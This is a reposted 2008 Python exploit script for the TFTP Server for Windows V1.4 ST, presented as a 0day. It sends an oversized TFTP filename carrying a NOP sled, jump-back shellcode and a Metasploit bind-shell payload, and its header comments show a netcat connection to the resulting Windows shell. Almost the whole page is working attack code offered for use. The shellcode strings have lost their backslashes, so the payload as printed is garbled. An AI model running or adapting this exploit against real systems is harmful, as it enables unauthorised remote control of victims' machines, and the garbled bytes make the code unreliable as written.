Home / os / win10

sourceforge-tftpd.py.txt

Posted on 27 March 2008

#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation.  All
# rights reserved.
#
# C:Windowssystem32>
##################################################################

import socket
import sys

print "[*] TFTP Server for Windows V1.4 ST (0day)"
print "[*] http://www.offensive-security.com"

host = '172.16.167.134'
port = 69

try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

# Jump back shellcode
sc = "x6ax05x59xd9xeexd9x74x24xf4x5bx81x73x13x16x91x9c"
sc +="x30x83xebxfcxe2xf4xcfx7fx45x44x32x65xc5xb0xd7x9b"
sc +="x0cxcexdbx6fx51xcfxf7x91x9cx30"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444

shell=("xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
"x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66"
"x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51"
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0"
"x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93"
"x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66"
"x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38"
"xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57"
"x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9"
"x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83"
"xc4x64xffxd6x52xffxd0x68xf0x8ax04x5fx53xffxd6"
"xffxd0")

filename = "x90"*860 + shell + "x90"*14 + sc + "xebxd0x90x90" + "x2bx0ex41"

mode = "netascii"

muha = "x00x02" + filename+ "" + mode+ ""

print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"

 

TOP

Malware :

Exploits :